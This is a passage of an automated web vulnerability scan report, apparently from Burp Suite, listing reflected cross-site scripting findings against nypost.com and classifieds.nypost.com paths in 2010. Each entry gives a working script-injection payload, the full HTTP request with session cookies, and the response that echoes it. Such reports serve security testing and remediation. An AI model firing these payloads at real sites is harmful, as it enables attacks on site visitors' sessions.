The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d9d"><script>alert(1)</script>cb3ffe9143a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle43d9d"><script>alert(1)</script>cb3ffe9143a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle43d9d"><script>alert(1)</script>cb3ffe9143a/" />
...[SNIP]...

1.126. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d140d"-alert(1)-"874e3b12df9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicled140d"-alert(1)-"874e3b12df9/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicled140d"-alert(1)-"874e3b12df9/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.127. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94da2"-alert(1)-"4da2e933c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle94da2"-alert(1)-"4da2e933c11/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle94da2"-alert(1)-"4da2e933c11/boat/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.128. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e0f"><script>alert(1)</script>b8143a09c17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle94e0f"><script>alert(1)</script>b8143a09c17/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle94e0f"><script>alert(1)</script>b8143a09c17/boat/" />
...[SNIP]...

1.129. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f2e"><script>alert(1)</script>62a9b46aed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle89f2e"><script>alert(1)</script>62a9b46aed7/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle89f2e"><script>alert(1)</script>62a9b46aed7/commercial_truck/" />
...[SNIP]...

1.130. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca932"-alert(1)-"95e05810fb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicleca932"-alert(1)-"95e05810fb1/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicleca932"-alert(1)-"95e05810fb1/commercial_truck/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.131. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c9a"-alert(1)-"1920298d3be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehiclec8c9a"-alert(1)-"1920298d3be/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehiclec8c9a"-alert(1)-"1920298d3be/motorcycle/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.132. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 300ff"><script>alert(1)</script>bf048b262db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle300ff"><script>alert(1)</script>bf048b262db/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle300ff"><script>alert(1)</script>bf048b262db/motorcycle/" />
...[SNIP]...

1.133. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a82<script>alert(1)</script>e5a8e75e2d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig84a82<script>alert(1)</script>e5a8e75e2d4/WebPortal/nypost/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig84a82<script>alert(1)</script>e5a8e75e2d4/WebPortal/nypost/hbx/hbx_original.js</p>
...[SNIP]...

1.134. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0085<script>alert(1)</script>853d668d213 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortalc0085<script>alert(1)</script>853d668d213/nypost/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortalc0085<script>alert(1)</script>853d668d213/nypost/hbx/hbx_original.js</p>
...[SNIP]...

1.135. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

